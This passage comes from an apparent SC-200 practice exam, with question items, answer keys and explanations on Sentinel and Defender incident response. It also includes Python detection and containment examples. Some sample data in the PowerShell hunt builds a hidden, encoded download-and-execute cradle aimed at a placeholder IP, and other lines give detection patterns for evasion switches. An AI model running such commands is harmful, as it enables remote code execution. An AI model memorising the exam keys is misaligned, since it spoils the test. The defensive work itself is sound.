Revoking all current sessions (Option A) and disabling the account (Option C) are the two immediate containment actions. Revocation invalidates the account's refresh tokens and browser session cookies, so the attacker can no longer renew access; access tokens that were already issued remain valid until they expire (about an hour by default) unless the resource supports continuous access evaluation, which is why the account is disabled at the same time so that no new tokens can be issued.

Exam trap

The trap here is that candidates often choose 'Reset the user's password' as the first action. A password reset on its own does not end sessions that are already established, and for hybrid accounts an on-premises change only reaches the cloud after synchronization, so explicit revocation and disabling must come first; the reset follows once the account is contained.

198
MCQhard

Refer to the exhibit. A SOC analyst runs this Advanced Hunting query in Microsoft Defender XDR to detect potential living-off-the-land (LotL) attacks. An alert is triggered when a device shows multiple occurrences of 'mshta.exe' executing with a remote script. Which additional data source should the analyst check to confirm the attack?

A.DeviceFileEvents
B.DeviceNetworkEvents
C.DeviceLogonEvents
D.DeviceRegistryEvents
AnswerB

Network events show the connections mshta.exe made to remote hosts, confirming that a remote script was actually fetched.

Why this answer

The correct answer is B. DeviceNetworkEvents records outbound connections together with the initiating process, so rows where InitiatingProcessFileName is mshta.exe and RemoteUrl or RemoteIP points at an external host confirm the remote script retrieval. File, logon and registry events may hold follow-on activity but do not show the connection itself.

199
Multi-Selectmedium

Which TWO actions should an analyst take when triaging a Microsoft Sentinel incident that involves a user who clicked a malicious link in a phishing email? (Choose two.)

Select 2 answers
A.Reset the user's password immediately.
B.Block the sender's domain in the tenant's block list.
C.Run a KQL query on EmailEvents to identify the email and recipient.
D.Delete the email from the user's mailbox immediately.
E.Check the email's status in Microsoft Defender for Office 365 Threat Explorer.
AnswersC, E

Identifies the malicious email and affected user.

Why this answer

Options C and E are correct. C: a KQL query against EmailEvents identifies the message, its sender and every recipient who received it. E: Threat Explorer in Microsoft Defender for Office 365 shows the email's delivery and threat status, including whether the link has already been blocked or detonated.

Option D is wrong because the email should not be deleted before the investigation is complete. Option A is wrong because resetting the password is premature until there is evidence that credentials were entered or the account is compromised. Option B is wrong because blocking the sender's domain is a follow-up hardening step, not triage.

200
MCQmedium

Your Microsoft Sentinel workspace receives logs from multiple sources. You need to ensure that an incident response playbook is triggered automatically when a specific alert is generated. What should you create?

A.A data connector.
B.An analytics rule.
C.An automation rule.
D.A new Logic App.
AnswerC

Automation rules can trigger playbooks on alert creation.

Why this answer

Option C is correct because an automation rule in Microsoft Sentinel can run a playbook when an alert or incident is created. Option A is wrong because a data connector ingests data; it does not trigger actions. Option B is wrong because an analytics rule generates the alert, but the playbook is attached to it through an automation rule.

Option D is wrong because a Logic App is the playbook itself, not the trigger that runs it.

201
MCQeasy

Refer to the exhibit. An automation rule is created in Microsoft Sentinel. A new incident is created with severity 'Medium' and two alerts: one 'High' and one 'Medium'. Will the playbook run?

A.No, because the incident severity is Medium.
B.Yes, because the incident contains a High severity alert.
C.Yes, because the playbook runs on all incidents regardless.
D.No, because the condition requires all alerts to be High.
AnswerB

An incident's severity is derived from the highest severity among its alerts, so an incident holding a High alert is a High incident and meets the condition.

Why this answer

The condition in the exhibit is evaluated against the incident, not against each alert individually. Sentinel sets the incident severity to the highest severity of the alerts grouped into it, so the High alert makes the incident High and the condition is met. Option A mistakes the initial severity for the final one, Option C ignores the condition altogether, and Option D describes a condition that does not exist.

202
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst receives an alert from a custom analytics rule that triggers on a specific sequence of failed logon attempts followed by a successful logon from an unusual location. The incident is generated but the analyst is not sure if the activity is malicious or a user error. What should the analyst do first to quickly gather additional context?

A.Run a KQL query across the entire workspace to find all related events
B.Create a new analytics rule to detect similar patterns
C.Use the Investigation graph to explore related entities and events
D.Modify the existing analytics rule to add more conditions
AnswerC

The Investigation graph provides a visual, entity-based approach to quickly understand incident context.

Why this answer

Option C is correct because the Investigation graph lets the analyst pivot from the incident to the user, the source IP address, the host and related alerts in one view, which is the fastest way to see whether the failed logons and the successful one belong to the same attacker activity. Option A is wrong because an unbounded KQL search across the whole workspace is slower and noisier than starting from the incident's own entities. Option B is wrong because creating a new analytics rule does not help with the investigation in hand.

Option D is wrong because modifying the existing rule is a tuning task, not a way to investigate a single incident.

203
MCQmedium

Refer to the exhibit. A security analyst runs this PowerShell script to query a Log Analytics workspace. What is the purpose of this query?

A.Count the number of unique devices
B.Identify all PowerShell executions in the last 7 days
C.List all processes run by a specific account
D.Detect suspicious PowerShell activity using encoded commands
E.Find devices that have not run PowerShell recently
AnswerD

The query specifically looks for '-EncodedCommand' in the PowerShell command line.

Why this answer

The query hunts for PowerShell executions whose command line carries an encoded command, a common obfuscation technique, rather than every PowerShell execution (B), the processes of one account (C), a count of devices (A) or devices that have been idle (E).

204
Multi-Selectmedium

Which TWO actions are appropriate when responding to a confirmed malware outbreak on multiple workstations identified by Microsoft Defender for Endpoint?

Select 2 answers
A.Collect investigation packages from the affected devices for analysis.
B.Add the malware hash to the custom threat indicator list.
C.Run a full antivirus scan on all workstations.
D.Reset passwords of all users who logged into the affected devices.
E.Isolate the affected devices from the network using Microsoft Defender for Endpoint.
AnswersA, E

Investigation packages provide forensic data to understand the scope and impact.

Why this answer

Collecting investigation packages (A) and isolating the affected devices (E) are the right first actions: isolation stops the malware spreading or reaching its command and control, and the package captures volatile evidence (running processes, network connections, autoruns, event logs) before it is lost. Running a full scan on every workstation (C) is reactive and slow, and does not contain devices that are already infected. Resetting passwords (D) may be needed later, once credential theft is confirmed, but does not stop the outbreak.

Adding the hash as a custom indicator (B) is a good follow-up to prevent re-execution elsewhere, but it does not contain devices that are already infected.

205
MCQhard

Refer to the exhibit. You are creating an automation rule in Microsoft Sentinel to trigger a playbook when an alert is created. However, the playbook does not run. What is the most likely cause?

A.The JSON syntax is invalid.
B.The playbook's resource ID is incorrect.
C.The automation rule lacks permissions to the playbook.
D.The displayName is not unique.
AnswerB

An incorrect resource ID prevents the automation rule from finding the playbook.

Why this answer

Option B is correct because the `logicAppResourceId` in the action configuration must point at an existing playbook; if it is wrong, the automation rule has nothing to run. Option A is wrong because the JSON in the exhibit is valid. Option C is wrong because nothing in the exhibit indicates a permission problem; in a real deployment, however, Sentinel must also be granted explicit permission to run playbooks (the Microsoft Sentinel Automation Contributor role on the playbook's resource group, granted from Playbook permissions in the Sentinel settings), so check that next if the resource ID turns out to be correct.

Option D is wrong because the display name does not have to be unique.

206
MCQeasy

Your organization uses Microsoft Sentinel. A security analyst reports a high number of false positives from a scheduled analytics rule that detects anomalous sign-ins. The rule uses the 'UserAgent' field in the SigninLogs table. What is the best practice to reduce false positives while maintaining detection coverage?

A.Increase the alert threshold to require more than one anomalous sign-in per hour.
B.Create a watchlist of legitimate IP addresses and reference it in the rule.
C.Disable the analytics rule and create a new one with different MITRE tactics.
D.Add a condition to the rule query to filter out known legitimate user agents.
AnswerD

Filtering out known legitimate user agents reduces false positives while maintaining detection.

Why this answer

Option D is correct because excluding known legitimate user agents in the rule query removes the noise while keeping the rule and its coverage intact. Option A is wrong because raising the threshold can hide real attacks that involve a single anomalous sign-in. Option B is wrong because a watchlist of legitimate IP addresses does not address false positives that are driven by the UserAgent field (a watchlist of legitimate user agents, referenced from the query, would be a maintainable way to implement option D).

Option C is wrong because disabling the rule removes coverage, and changing the MITRE tactics does not change what the query matches.

207
MCQhard

Refer to the exhibit. A security analyst runs this KQL query in Microsoft Defender XDR advanced hunting. What is the most likely purpose of this query?

A.To find accounts with failed logon attempts indicating brute force
B.To find devices that made outbound network connections to known malicious IPs
C.To identify accounts or devices with high volumes of suspicious PowerShell activity
D.To detect persistence mechanisms like scheduled tasks
AnswerC

The query focuses on PowerShell with encoding/switches and high counts.

Why this answer

Option C is correct because the query filters for PowerShell executions whose command line contains encoding or evasion switches, groups them by device and account, and keeps the devices or accounts with more than 5 such executions in the last 7 days. That is the usual shape of a hunt for excessive or suspicious PowerShell use. Option A is wrong because the query does not look at failed logons.

Option B is wrong because the query does not examine network connections or destination IP addresses. Option D is wrong because it counts process executions, not scheduled tasks, services or registry run keys.
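Neither exhibit survives on this page, so the following is an added example, not the exam's query or Microsoft's code. It implements the hunt described in questions 203 and 207 in Python over constructed DeviceProcessEvents-shaped rows: find PowerShell runs that carry an -EncodedCommand operand (powershell.exe accepts any unambiguous prefix of the switch, so -e, -ec and -enc are handled too) or common evasion switches, decode the base64/UTF-16LE payload so the analyst can see what actually ran, and keep the device/account pairs with more than 5 such runs in 7 days. The column names follow the advanced hunting schema; the device names, accounts, timestamps and the stager command line are invented for the example.

```python
import base64
import binascii
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the switch by prefix; "-ex"/"-ep" are other switches and are filtered below.
_ENC_SWITCH = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Switches commonly paired with encoded payloads to avoid the profile, the window and policy.
_EVASION = re.compile(
    r"(?:^|\s)-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
    r"ep\s+bypass|executionpolicy\s+bypass)(?=\s|$)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """base64(UTF-16LE), the form powershell.exe expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_payload(cmdline: str):
    """Return the base64 operand of an -EncodedCommand switch, or None if absent."""
    for m in _ENC_SWITCH.finditer(cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            return m.group(2)
    return None


def decode_encoded_command(b64: str):
    """Decode base64/UTF-16LE; None if the operand is not well formed."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le") if len(raw) % 2 == 0 else None
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> dict:
    """Classify one DeviceProcessEvents-shaped row."""
    cmd = event.get("ProcessCommandLine", "")
    is_ps = event.get("FileName", "").lower() in ("powershell.exe", "pwsh.exe")
    payload = extract_encoded_payload(cmd) if is_ps else None
    return {
        "DeviceName": event["DeviceName"],
        "AccountName": event["AccountName"],
        "encoded": payload is not None,
        "decoded_command": decode_encoded_command(payload) if payload else None,
        "evasion_switches": sorted({m.group(0).strip().lower()
                                    for m in _EVASION.finditer(cmd)}) if is_ps else [],
    }


def hunt(events, now, window_days=7, threshold=5):
    """Equivalent of summarize count() by DeviceName, AccountName | where count_ > threshold
    over the last window_days, counting encoded or evasion-flagged PowerShell runs."""
    cutoff = now - timedelta(days=window_days)
    counts = Counter()
    for ev in events:
        ts = datetime.fromisoformat(ev["Timestamp"].replace("Z", "+00:00"))
        if ts < cutoff:
            continue
        a = analyze_event(ev)
        if a["encoded"] or a["evasion_switches"]:
            counts[(a["DeviceName"], a["AccountName"])] += 1
    return sorted(((dev, acct, n) for (dev, acct), n in counts.items() if n > threshold),
                  key=lambda t: -t[2])


# Constructed sample data (not real telemetry): column names follow the advanced
# hunting schema, everything else is invented for the example.
NOW = datetime(2024, 5, 8, 12, 0, tzinfo=timezone.utc)
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"


def _row(ts, device, account, cmdline):
    return {"Timestamp": ts.strftime("%Y-%m-%dT%H:%M:%SZ"), "DeviceName": device,
            "AccountName": account, "FileName": "powershell.exe",
            "ProcessCommandLine": cmdline}


SAMPLE_EVENTS = (
    # six hidden-window encoded runs on ws-01 by alice inside the window: over threshold
    [_row(NOW - timedelta(hours=h), "ws-01", "alice",
          f"powershell.exe -nop -w hidden -enc {encode_command(STAGER)}") for h in range(1, 7)]
    # one more by alice, eight days old: outside the 7-day window, not counted
    + [_row(NOW - timedelta(days=8), "ws-01", "alice",
            f"powershell.exe -EncodedCommand {encode_command(STAGER)}")]
    # two on ws-02 by bob: encoded, but below the threshold
    + [_row(NOW - timedelta(hours=h), "ws-02", "bob",
            f"powershell.exe -ec {encode_command('Get-Process')}") for h in (2, 3)]
    # a benign scheduled script: no encoding, no evasion switches
    + [_row(NOW - timedelta(hours=4), "ws-03", "svc-backup",
            r"powershell.exe -File C:\scripts\backup.ps1")]
)

if __name__ == "__main__":
    for dev, acct, n in hunt(SAMPLE_EVENTS, NOW):
        print(f"{dev} / {acct}: {n} suspicious PowerShell runs in 7 days")
    print("decoded:", analyze_event(SAMPLE_EVENTS[0])["decoded_command"])
```

The decode step is what the KQL in the exhibit cannot do on its own: a count tells you someone is using encoded commands, the decoded text tells you whether it is a download cradle or an admin's backup job, which is the difference between escalating and tuning the rule.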

208
Multi-Selecteasy

Which TWO options are valid ways to create an incident in Microsoft Sentinel?

Select 2 answers
A.By creating a workbook
B.From an alert generated by an analytics rule
C.By importing data from a watchlist
D.By running a hunting query
E.By synchronizing incidents from Microsoft Defender XDR
AnswersB, E

Analytics rules create alerts that are grouped into incidents.

Why this answer

Options B and E are correct. Analytics rules generate alerts that Sentinel groups into incidents, and incidents from Microsoft Defender XDR are synchronized into Sentinel through the Defender XDR connector. Option A is wrong because workbooks only visualize data.

Option C is wrong because watchlists are for enrichment and correlation. Option D is wrong because a hunting query does not create an incident by itself; the analyst has to bookmark the results and create the incident manually.

209
MCQhard

Your company uses Microsoft Defender for Endpoint (MDE) on all Windows 10 devices. You are investigating a machine that is suspected of being part of a botnet. The machine is communicating with a known C2 server at IP 203.0.113.55. You have confirmed that the IP is malicious. You need to block all outbound traffic from the machine to that IP immediately, and also ensure that no other devices in the organization can communicate with that IP. The solution must be implemented without deploying additional network appliances. What should you do?

A.Create a network protection policy in Microsoft Intune to block the IP
B.Create a custom network indicator in Microsoft Defender for Endpoint with action 'Alert and block'
C.Use the Microsoft Defender for Endpoint portal to block the IP globally
D.Create a firewall rule in Windows Defender Firewall to block outbound traffic to the IP, and deploy via Group Policy
AnswerB

Custom network indicators allow blocking IPs across all MDE devices.

Why this answer

Option B is correct because a custom network indicator in Defender for Endpoint with the action 'Alert and block' is enforced on every onboarded device, so the investigated machine and all other devices stop reaching the IP without any network appliance. Network indicators are enforced by the network protection feature, which must be enabled in block mode on the devices. Option A is wrong because Intune network protection settings turn the feature on or off; they do not carry a custom IP blocklist. Option D is wrong because a Windows Defender Firewall rule would have to be deployed through Group Policy or Intune, which is slower and harder to keep consistent than an MDE indicator.

Option C is wrong because the portal has no separate 'global IP blocklist' feature; the custom indicator is the mechanism.

210
Multi-Selecthard

Which TWO indicators of compromise (IOCs) are most likely to be included in a Microsoft Sentinel threat intelligence feed to detect a known malware campaign?

Select 2 answers
A.Domain name
B.File hash (SHA-256)
C.Email address
D.Registry key
E.IP address
AnswersB, E

File hashes identify malware samples and IP addresses identify their infrastructure; both are standard indicator types in threat intelligence feeds.

Why this answer

The correct answers are B and E. SHA-256 hashes and IP addresses are the most common indicators in feeds that describe a malware campaign, and both map directly to Sentinel threat intelligence indicator types. Domain names and email addresses are also valid indicator types and are often present, but the question asks for the two most likely for a malware campaign.

Registry keys are host artifacts found during forensics; they are rarely distributed as indicators in a feed.

211
Multi-Selectmedium

Your organization uses Microsoft 365 Defender. You are investigating a potential malware outbreak on several endpoints. Which TWO actions should you take to isolate affected devices and prevent lateral movement?

Select 2 answers
A.Use Microsoft Defender for Endpoint to initiate device isolation on affected devices.
B.Run a full antivirus scan on all endpoints.
C.Reset the passwords of all users on the affected devices.
D.Delete the user accounts that logged into the affected devices.
E.Block the file hash of the malware in Microsoft Defender for Endpoint indicators.
AnswersA, E

Isolation stops network communication, preventing lateral spread.

Why this answer

Options A and E are correct. Isolating the devices from the network (A) stops communication with other devices, and blocking the malware's file hash as a Defender for Endpoint indicator (E) prevents it from executing on other endpoints. Option C is wrong because resetting passwords does not stop malware that is already running from moving laterally.

Option B is wrong because a full scan takes time and does not isolate anything. Option D is wrong because deleting user accounts is destructive and does not address the malware.

212
Multi-Selectmedium

Which THREE indicators of compromise (IOCs) are commonly used in Microsoft Sentinel to detect advanced persistent threats (APTs)? (Choose THREE.)

Select 3 answers
A.Suspicious domains and URLs.
B.Vulnerability scan results.
C.File hashes (SHA256) of known malware.
D.Windows event IDs for successful logins.
E.IP addresses of known command and control servers.
AnswersA, C, E

Domains and URLs are common IOCs.

Why this answer

Options A, C and E are correct: suspicious domains and URLs, hashes of known malware and IP addresses of command and control servers are the indicator types Sentinel matches against ingested logs. Option B is wrong because vulnerability scan results describe your own exposure, not attacker activity. Option D is wrong because event IDs for successful logins are ordinary telemetry; they only become meaningful once correlated with an indicator.
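As an added example (not from the page or from Microsoft), the following Python builds and validates the request body for a Defender for Endpoint custom indicator of the kind question 209 recommends, for the three indicator types questions 210 and 212 single out: IP address, SHA-256 hash and domain. The field names are those of the Defender for Endpoint indicators API (POST https://api.securitycenter.microsoft.com/api/indicators); submitting the body and obtaining the bearer token are outside the snippet. The validation is the part worth keeping: it refuses RFC 1918, loopback, link-local and multicast addresses, because an analyst who pastes the wrong column (the 10.0.0.x LocalIPAddress from question 185, say) into a tenant-wide 'Alert and block' indicator takes the network down rather than the attacker, and it refuses CIDR ranges, since the indicator type takes single addresses. Documentation ranges such as 203.0.113.0/24 are deliberately allowed so that exercise data passes.

```python
import ipaddress
import re
from datetime import datetime, timedelta, timezone

# Values accepted by the Defender for Endpoint indicators API.
INDICATOR_TYPES = {"ip": "IpAddress", "sha256": "FileSha256", "domain": "DomainName"}
ACTIONS = {"Alert", "Warn", "Block", "Audit", "BlockAndRemediate", "AlertAndBlock", "Allowed"}
SEVERITIES = {"Informational", "Low", "Medium", "High"}

# Address space that must never be blocked tenant-wide: doing so cuts devices off
# from their own networks, not from the attacker. Documentation ranges (for example
# 203.0.113.0/24) are left alone so exercise data like the C2 in question 209 passes.
_NEVER_BLOCK = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]

_SHA256 = re.compile(r"^[0-9a-f]{64}$")
_LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")


class IndicatorError(ValueError):
    """Raised when a value is not a single, blockable indicator."""


def classify(value: str):
    """Return (kind, normalized value) for an IP, SHA-256 or domain; raise otherwise."""
    v = value.strip()
    try:
        ip = ipaddress.ip_address(v)   # fails on CIDR/ranges: single hosts only
    except ValueError:
        ip = None
    if ip is not None:
        if (ip.is_loopback or ip.is_link_local or ip.is_multicast or ip.is_unspecified
                or any(ip in net for net in _NEVER_BLOCK)):
            raise IndicatorError(f"refusing to block internal/special address {ip}")
        return "ip", str(ip)
    if _SHA256.match(v.lower()):
        return "sha256", v.lower()
    host = v.lower().rstrip(".")
    labels = host.split(".")
    if len(labels) >= 2 and all(_LABEL.match(l) for l in labels) and labels[-1].isalpha():
        return "domain", host
    raise IndicatorError(f"not a single IP address, SHA-256 hash or domain: {value!r}")


def is_blockable(value: str) -> bool:
    """True if build_indicator would accept the value."""
    try:
        classify(value)
        return True
    except IndicatorError:
        return False


def build_indicator(value, title, action="AlertAndBlock", severity="High",
                    ttl_days=30, description="", recommended_actions=""):
    """Build the JSON body for POST /api/indicators after validating the value."""
    if action not in ACTIONS:
        raise IndicatorError(f"unknown action {action!r}")
    if severity not in SEVERITIES:
        raise IndicatorError(f"unknown severity {severity!r}")
    kind, normalized = classify(value)
    expires = datetime.now(timezone.utc) + timedelta(days=ttl_days)
    return {
        "indicatorValue": normalized,
        "indicatorType": INDICATOR_TYPES[kind],
        "action": action,
        "title": title,
        "description": description or f"{INDICATOR_TYPES[kind]} indicator: {title}",
        "severity": severity,
        # Indicators should expire and be re-reviewed, not accumulate forever.
        "expirationTime": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "recommendedActions": recommended_actions,
    }


if __name__ == "__main__":
    import json
    # Constructed values: the C2 address from question 209, an invented hash and domain.
    for v in ("203.0.113.55", "ab" * 32, "c2.Example.COM."):
        print(json.dumps(build_indicator(v, "IR-0042 known C2"), indent=2))
    for v in ("10.0.0.5", "203.0.113.0/24"):
        print(v, "blockable:", is_blockable(v))
```

A practitioner would wire build_indicator into the playbook that runs on confirmation of a C2, so that the same checks apply whether the indicator is added by hand or by automation.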

213
MCQhard

Your organization has a hybrid identity environment with Microsoft Entra ID (Azure AD) and on-premises Active Directory. You are using Microsoft Defender for Identity (MDI) integrated with Microsoft Defender XDR. An incident is raised indicating that a user account has been compromised because of an anomaly in Kerberos protocol activity. The incident severity is High. You need to contain the incident immediately by disabling the user account across both on-premises and cloud. However, you also want to preserve the account for forensic analysis. What is the recommended course of action?

A.Delete the user account from Microsoft Entra ID and on-premises AD immediately.
B.Reset the user's password in Microsoft Entra ID and force a password change at next logon on-premises.
C.Enable conditional access policy to require MFA for the user and revoke all refresh tokens.
D.From Microsoft Defender XDR incident, use the action to disable the user account in Microsoft Entra ID and also disable the on-premises account using a playbook that runs a PowerShell script.
AnswerD

Disabling the account stops access and preserves the account for forensics.

Why this answer

Option D is correct because disabling the account in both Microsoft Entra ID and on-premises Active Directory stops all further use, cloud sign-ins and Kerberos alike, while keeping the account object, its attributes and its logs for forensic analysis. (When the Defender for Identity action account is configured, the on-premises disable can also be issued directly from the user page in Microsoft Defender XDR instead of through a playbook.)

Option A is wrong because deleting the account destroys the forensic evidence. Option B is wrong because a password reset alone does not stop an attacker who already holds Kerberos tickets or other credentials for the account. Option C is wrong because Conditional Access and token revocation govern cloud sign-ins and do not block on-premises Kerberos authentication.

214
MCQmedium

You are investigating a potential ransomware incident in Microsoft Defender XDR. The incident has a high severity alert indicating that a user installed a suspicious application. Which initial response action should you take to contain the threat while preserving evidence?

A.Isolate the device using Microsoft Defender for Endpoint.
B.Reset the user's password and enforce MFA.
C.Uninstall the suspicious application via Intune.
D.Disable the user account in Microsoft Entra ID.
AnswerA

Isolation stops communication and contains the threat while preserving evidence.

Why this answer

Option A is correct because isolating the device from the network immediately stops lateral movement, data exfiltration and command and control while leaving the device, its memory and its disk intact for forensic collection. Option D is wrong because disabling the user account does not stop malware that is already running on the device. Option C is wrong because uninstalling the application may remove evidence.

Option B is wrong because resetting the password does not contain the threat on the device.

215
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. You receive an alert from Defender for Cloud that a virtual machine has a high severity vulnerability: 'CVE-2023-XXXX' with a CVSS score of 9.8. The virtual machine is running a critical application for the finance department. You need to remediate the vulnerability as quickly as possible while minimizing downtime. The application vendor has not yet released a patch but has provided a workaround. What should you do?

A.Dismiss the alert as a false positive because no patch is available.
B.Shut down the virtual machine until a patch is available.
C.Implement the workaround provided by the vendor and create a custom remediation task in Defender for Cloud to track the issue.
D.Apply a network security group to block all inbound traffic to the VM.
AnswerC

Workaround reduces risk while minimizing downtime.

Why this answer

Option C is correct because applying the vendor-provided workaround reduces the risk while the patch is pending, and tracking it in Defender for Cloud keeps the exposure visible until it is fully remediated. Option A is wrong because ignoring a CVSS 9.8 finding is not acceptable; a missing patch does not make the alert a false positive. Option B is wrong because shutting down the VM takes a critical application offline.

Option D is wrong because blocking all inbound traffic also takes the application offline and may not match the vulnerability's actual attack path.

216
MCQhard

Refer to the exhibit. You are investigating incidents related to suspicious process injection. The KQL query above is run in Microsoft Sentinel. What is the purpose of this query?

A.To find alerts that occurred within a specific time range
B.To list all alerts of type 'Suspicious process injection' in the last 7 days
C.To get a count of 'Suspicious process injection' alerts grouped by compromised entity and severity, sorted by count
D.To identify the compromised entities with the highest severity alerts
AnswerC

This matches the query logic.

Why this answer

The correct answer is C because the query filters on the alert name, summarizes the count by compromised entity and severity, and orders the result by that count. Option A is wrong because the time filter is only a precondition of the query, not its purpose. Option B is wrong because the query aggregates the alerts rather than listing them.

Option D is wrong because the result is sorted by count, not by severity.

217
MCQeasy

You are investigating an incident where a user reported receiving a suspicious email with an attachment. The attachment is a .docm file that contains macros. The email was not blocked by Exchange Online Protection. You need to ensure that similar emails are blocked in the future. What should you configure?

A.Create a Safe Links policy to block links in the email.
B.Create a Safe Attachments policy that blocks .docm files.
C.Create an anti-phishing policy to block the sender's domain.
D.Create a transport rule to block emails with .docm attachments.
AnswerB

Safe Attachments detonates attachments in a sandbox and blocks those that behave maliciously.

Why this answer

Option B is correct because a Safe Attachments policy in Microsoft Defender for Office 365 opens each attachment in a detonation environment and blocks or replaces the ones that behave maliciously, which catches macro-based malware that signature-based filtering missed. Option A is wrong because Safe Links rewrites and scans URLs, not attachments. Option C is wrong because anti-phishing policies address impersonation and spoofing, not malicious attachments.

Option D is wrong because a mail flow rule that blocks every .docm file is blunt: it blocks legitimate macro-enabled documents as well and does nothing about other malicious attachment types.

218
Multi-Selecthard

Your organization uses Microsoft Defender XDR. A security incident involving a compromised user account has been identified. Which THREE actions should you take to contain and remediate the incident?

Select 3 answers
A.Disable the user account in Microsoft Entra ID.
B.Reset the user's password.
C.Block all IP addresses that the user has connected from.
D.Revoke all active sessions and tokens for the user.
E.Restore the user's mailbox from a backup.
AnswersA, B, D

Disabling the account stops further access.

Why this answer

Disabling the user account (A) prevents further sign-ins. Resetting the password (B) makes the stolen credential useless when the account is re-enabled. Revoking sessions and tokens (D) terminates access that is already established.

Option C is incorrect because blocking every IP address the user connected from is too broad and will affect legitimate users behind the same addresses. Option E is incorrect because restoring the mailbox from a backup is neither immediate nor a containment action, and it does not address how the account was compromised.
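The containment sequence that questions 197 and 218 describe, as an added example (not the page's or Microsoft's code): disable the account so no new token can be issued, revoke its refresh tokens and browser sessions, then rotate the password. It uses the Microsoft Graph v1.0 calls for each step (PATCH /users/{id} with accountEnabled, POST /users/{id}/revokeSignInSessions, PATCH /users/{id} with passwordProfile). The sender is injected so the sequence can be exercised offline with a recording stub; the real sender assumes you already hold a Graph access token with the user-write permissions those calls require. The run stops at the first failed step so a partial run is never reported as containment.

```python
from __future__ import annotations

import json
import secrets
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Optional, Tuple

GRAPH = "https://graph.microsoft.com/v1.0"


@dataclass
class GraphCall:
    method: str
    path: str                      # relative to GRAPH
    body: Optional[dict] = None


@dataclass
class StepResult:
    name: str
    call: GraphCall
    status: int
    response: Optional[dict]
    ok: bool


def containment_plan(user_id: str, reset_password: bool = True):
    """Ordered steps. Disable first so no new token can be issued, then revoke
    refresh tokens and browser sessions, then rotate the password so the stolen
    credential is dead by the time the account is re-enabled."""
    plan = [
        ("disable", GraphCall("PATCH", f"/users/{user_id}", {"accountEnabled": False})),
        ("revoke", GraphCall("POST", f"/users/{user_id}/revokeSignInSessions")),
    ]
    if reset_password:
        plan.append(("reset", GraphCall("PATCH", f"/users/{user_id}", {
            "passwordProfile": {
                "forceChangePasswordNextSignIn": True,
                # Random temporary password; hand it over out of band, never log it.
                "password": secrets.token_urlsafe(24),
            }})))
    return plan


def contain_user(user_id: str, send: Callable[[GraphCall], Tuple[int, Optional[dict]]],
                 reset_password: bool = True) -> list[StepResult]:
    """Run the plan, stopping at the first failure so a partial run is never
    mistaken for containment (the caller must re-run or escalate)."""
    results = []
    for name, call in containment_plan(user_id, reset_password):
        status, response = send(call)
        ok = 200 <= status < 300
        results.append(StepResult(name, call, status, response, ok))
        if not ok:
            break
    return results


def graph_sender(access_token: str):
    """Real sender: one bearer-authenticated HTTPS request per call (needs network)."""
    def send(call: GraphCall):
        data = json.dumps(call.body).encode() if call.body is not None else None
        req = urllib.request.Request(GRAPH + call.path, data=data, method=call.method,
                                     headers={"Authorization": f"Bearer {access_token}",
                                              "Content-Type": "application/json"})
        try:
            with urllib.request.urlopen(req, timeout=30) as resp:
                raw = resp.read()
                return resp.status, (json.loads(raw) if raw else None)
        except urllib.error.HTTPError as err:
            raw = err.read()
            return err.code, (json.loads(raw) if raw else None)
    return send


class RecordingSender:
    """Offline stand-in for Graph: records calls and answers with the status codes
    Graph documents (204 for PATCH /users/{id}, 200 plus {"value": true} for
    revokeSignInSessions). fail_on=(method, path) simulates a denied call."""
    def __init__(self, fail_on: Optional[Tuple[str, str]] = None):
        self.calls = []
        self.fail_on = fail_on

    def __call__(self, call: GraphCall):
        self.calls.append(call)
        if self.fail_on == (call.method, call.path):
            return 403, {"error": {"code": "Authorization_RequestDenied"}}
        if call.path.endswith("/revokeSignInSessions"):
            return 200, {"value": True}
        return 204, None


if __name__ == "__main__":
    stub = RecordingSender()            # constructed: no tenant is contacted
    for step in contain_user("jdoe@contoso.com", stub):
        print(f"{step.name:8} {step.call.method} {step.call.path} -> {step.status}")
```

Access tokens already in the attacker's hands stay valid until they expire even after the revoke call, which is why the disable step comes first and why the on-premises account is disabled as well in a hybrid environment (question 213).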

219
MCQ · medium

Your organization uses Microsoft Sentinel. A security analyst reports that an incident was automatically closed without investigation. You need to identify why the incident was closed automatically. Which Sentinel feature should you review?

A. Analytics rules
B. Automation rules
C. Playbooks
D. Workbooks
E. Watchlists
Answer: B

Automation rules can automatically close incidents based on conditions such as severity or title.

Why this answer

Automation rules can be configured to automatically close incidents based on conditions. Playbooks require manual triggering or automation rules. Analytics rules create incidents, not close them.

Workbooks and watchlists do not close incidents.

220
MCQ · hard

Your organization uses Microsoft Defender for Cloud Apps. A security analyst discovers that a user's account has been compromised and is exfiltrating sensitive data from SharePoint Online. The analyst needs to immediately block the suspicious activities while allowing legitimate user activities to continue. What should the analyst do?

A. Reset the user's password and require MFA
B. Suspend the user from Defender for Cloud Apps
C. Revoke all OAuth tokens for the user
D. Block the user's IP address in the firewall
Answer: B

Suspending the user immediately blocks access to all cloud apps.

Why this answer

Option B is correct because the 'Suspend user' action in Defender for Cloud Apps immediately blocks the user's access to cloud apps, stopping exfiltration. Option C is wrong because revoking all OAuth tokens might affect other apps and is less targeted. Option A is wrong because changing the password does not immediately stop active sessions.

Option D is wrong because blocking the IP address may affect other users if the IP is shared.

221
MCQ · medium

Your organization uses Microsoft Defender for Cloud to assess the security posture of Azure subscriptions. You receive an alert that a critical vulnerability exists on a virtual machine. What is the BEST immediate action to validate the alert and contain the threat?

A. Contact Microsoft support to request a vulnerability assessment.
